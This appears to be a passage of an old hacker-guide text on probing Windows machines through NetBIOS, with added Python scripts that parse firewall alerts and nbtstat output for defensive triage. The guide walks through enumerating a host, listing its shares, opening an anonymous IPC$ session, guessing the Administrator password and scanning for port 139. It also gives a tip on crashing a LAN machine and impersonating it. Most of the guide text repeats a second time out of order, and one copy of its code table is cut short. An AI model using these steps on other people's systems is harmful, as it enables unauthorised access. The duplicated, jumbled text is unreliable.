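LAN = ipaddress.ip_network("10.0.0.0/24")

ALERT_RE = re.compile(
    r"blocked Internet access to your computer \((?P<service>[^)]+)\) "
    r"from (?P<src>\S+) \((?P<proto>TCP|UDP) Port (?P<sport>\d+)\)"
)


def parse_alert(line: str) -> Optional[Dict[str, object]]:
    """Pull service, source address and source port out of one alert line.

    Returns None for lines that are not alerts (e.g. the 'Occurred:' summary line).
    """
    m = ALERT_RE.search(line)
    if m is None:
        return None
    alert: Dict[str, object] = dict(m.groupdict())
    alert["sport"] = int(str(alert["sport"]))
    alert["netbios"] = str(alert["service"]).startswith("NetBIOS")
    try:
        src = ipaddress.ip_address(str(alert["src"]))
        alert["valid_src"] = True
        alert["from_lan"] = src in LAN
    except ValueError:
        # Redacted or corrupt address (the guide's 999.209.116.123): it cannot be
        # attributed to the LAN or to the Internet, so it gets its own bucket.
        alert["valid_src"] = False
        alert["from_lan"] = False
    return alert


def classify(alert: Dict[str, object]) -> str:
    """Label one parsed alert the way the guide reasons about it."""
    if not alert["netbios"]:
        return "other"
    if not alert["valid_src"]:
        return "netbios-unparseable-source"
    if alert["from_lan"]:
        # Normally the local browser service looking for peers. Note the guide's
        # caveat: an outside attacker can forge a LAN source address, so a LAN
        # address arriving on the Internet-facing interface still deserves a look.
        return "netbios-lan-chatter"
    return "netbios-external-probe"


def triage(lines) -> Dict[str, int]:
    """Count alert lines per label; non-alert lines are counted as 'unparsed'."""
    counts: Counter = Counter()
    for line in lines:
        alert = parse_alert(line)
        counts["unparsed" if alert is None else classify(alert)] += 1
    return dict(counts)


def external_probe_sources(lines) -> Dict[str, int]:
    """Source addresses of NetBIOS probes from outside the LAN, with hit counts."""
    hits: Counter = Counter()
    for line in lines:
        alert = parse_alert(line)
        if alert is not None and classify(alert) == "netbios-external-probe":
            hits[str(alert["src"])] += 1
    return dict(hits)
```

Feed `triage()` the alert lines exported from the IDS log; `external_probe_sources()` gives the repeat offenders worth reporting to their provider.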
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are when you make it so other computers can access files and directories on your computer. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that only NetBIOS uses. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
OLDGUY <00> UNIQUE Registered
OLDGUY <20> UNIQUE Registered
WARGAME <00> GROUP Registered
INet~Services <1C> GROUP Registered
IS~OLDGUY......<00> UNIQUE Registered
OLDGUY <03> UNIQUE Registered
WARGAME <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name               Number  Type  Usage
=========================================================
<computername>     00      U     Workstation Service
<computername>     01      U     Messenger Service
<\\_MSBROWSE_>     01      G     Master Browser
<computername>     03      U     Messenger Service
<computername>     06      U     RAS Server Service
<computername>     1F      U     NetDDE Service
<computername>     20      U     File Server Service
<computername>     21      U     RAS Client Service
<computername>     22      U     Exchange Interchange
<computername>     23      U     Exchange Store
<computername>     24      U     Exchange Directory
<computername>     30      U     Modem Sharing Server Service
<computername>     31      U     Modem Sharing Client Service
<computername>     43      U     SMS Client Remote Control
<computername>     44      U     SMS Admin Remote Control Tool
<computername>     45      U     SMS Client Remote Chat
<computername>     46      U     SMS Client Remote Transfer
<computername>     4C      U     DEC Pathworks TCPIP Service
<computername>     52      U     DEC Pathworks TCPIP Service
<computername>     87      U     Exchange MTA
<computername>     6A      U     Exchange IMC
<computername>     BE      U     Network Monitor Agent
<computername>     BF      U     Network Monitor Apps
<username>         03      U     Messenger Service
<domain>           00      G     Domain Name
<domain>           1B      U     Domain Master Browser
<domain>           1C      G     Domain Controllers
<domain>           1D      U     Master Browser
<domain>           1E      G     Browser Service Elections
<INet~Services>    1C      G     Internet Information Server
<IS~computername>  00      U     Internet Information Server
To keep this Guide from being ridiculously long, we'll just explain a few of the things we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
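The inferences just listed can be drawn mechanically from the name table. The following Python script is an added example, not part of the original guide: it parses a re-typed copy of the nbtstat output above (constructed sample input), decodes each suffix with the Rhino9 table, and turns the result into the list of exposures the machine's owner should close.

```python
import re
from typing import Dict, List

# Constructed sample input: the nbtstat -a 10.0.0.2 output from the guide, re-typed.
SAMPLE_NBTSTAT = """\
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    OLDGUY         <00>  UNIQUE      Registered
    OLDGUY         <20>  UNIQUE      Registered
    WARGAME        <00>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~OLDGUY......<00>  UNIQUE      Registered
    OLDGUY         <03>  UNIQUE      Registered
    WARGAME        <1E>  GROUP       Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered
    MAC Address = 52-54-00-E4-6F-40
"""

# Suffix meanings keyed by (hex suffix, UNIQUE/GROUP), a subset of the Rhino9 table.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain Name",
    ("01", "GROUP"): "Master Browser",
    ("03", "UNIQUE"): "Messenger Service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("20", "UNIQUE"): "File Server Service",
    ("21", "UNIQUE"): "RAS Client Service",
}

# A row looks like "OLDGUY <20> UNIQUE Registered"; IIS pads its name with dots
# right up to the suffix ("IS~OLDGUY......<00>"), so dots before '<' are dropped.
ENTRY_RE = re.compile(r"^\s*(\S+?)\.*\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_name_table(text: str) -> List[Dict[str, str]]:
    """One record per name-table row, with the suffix decoded to its service."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m is None:
            continue
        name, suffix, kind, status = m.group(1), m.group(2).upper(), m.group(3), m.group(4)
        if name == "INet~Services" or name.startswith("IS~"):
            meaning = "Internet Information Server"
        else:
            meaning = SUFFIX_MEANING.get((suffix, kind), "unknown")
        entries.append({"name": name, "suffix": suffix, "kind": kind,
                        "status": status, "meaning": meaning})
    return entries


def summarize(text: str) -> Dict[str, object]:
    """Draw the conclusions the guide draws by hand from the table."""
    entries = parse_name_table(text)
    computer = next((e["name"] for e in entries if e["suffix"] == "00"
                     and e["kind"] == "UNIQUE" and not e["name"].startswith("IS~")), None)
    domain = next((e["name"] for e in entries
                   if e["suffix"] == "00" and e["kind"] == "GROUP"), None)
    # <03> UNIQUE entries other than the machine name are logged-on user names.
    users = sorted({e["name"] for e in entries if e["suffix"] == "03"
                    and e["kind"] == "UNIQUE" and e["name"] != computer})
    mac = MAC_RE.search(text)
    return {
        "computer": computer,
        "domain": domain,
        "users": users,
        "file_server": any(e["suffix"] == "20" and e["kind"] == "UNIQUE" for e in entries),
        "iis": any(e["meaning"] == "Internet Information Server" for e in entries),
        "mac": mac.group(1) if mac else None,
    }


def findings(summary: Dict[str, object]) -> List[str]:
    """What the owner should fix, one note per fact an unauthenticated query reveals."""
    notes = ["Name table answered: NetBIOS over TCP/IP is reachable; disable NetBT "
             "on Internet-facing interfaces or filter UDP 137/138 and TCP 139/445."]
    if summary["file_server"]:
        notes.append("<20> File Server Service registered: shares are reachable; "
                     "review share permissions (NT defaults to Everyone).")
    if summary["iis"]:
        notes.append("IIS advertises itself via INet~Services <1C>.")
    for user in summary["users"]:
        note = f"Logged-on user name disclosed via <03>: {user}"
        if user.upper() == "ADMINISTRATOR":
            note += " (the built-in Administrator account has not been renamed)"
        notes.append(note + ".")
    return notes
```

Run `findings(summarize(SAMPLE_NBTSTAT))` to see the exposure list for Oldguy; paste in your own `nbtstat -a` output to check a machine you administer.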
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in."
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once you Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the command:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP
command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET HELP
• NET SHARE
• NET COMPUTER
• NET HELPMSG
• NET START
• NET CONFIG
• NET LOCALGROUP
• NET STATISTICS
• NET CONFIG SERVER
• NET NAME
• NET STOP
• NET CONFIG WORKSTATION
• NET PAUSE
• NET TIME
• NET CONTINUE
• NET PRINT
• NET USE
• NET FILE
• NET SEND
• NET USER
• NET GROUP
• NET SESSION
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at . There is also a Windows version of nmap, but it isn't very good. A better choice for Windows is Whats Up from . You can get a one month free trial of it.
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml.
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see .
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are when you make it so other computers can access files and directories on your computer. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that only NetBIOS uses. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
OLDGUY <00> UNIQUE Registered
OLDGUY <20> UNIQUE Registered
WARGAME <00> GROUP Registered
INet~Services <1C> GROUP Registered
IS~OLDGUY......<00> UNIQUE Registered
OLDGUY <03> UNIQUE Registered
WARGAME <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name Number Type Usage =========================================================
<\\_MSBROWSE_> 01 G Master Browser
To keep this Guide from being ridiculously long, we'll just explain a few of the things what we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in.
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once You Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the command:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting on one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
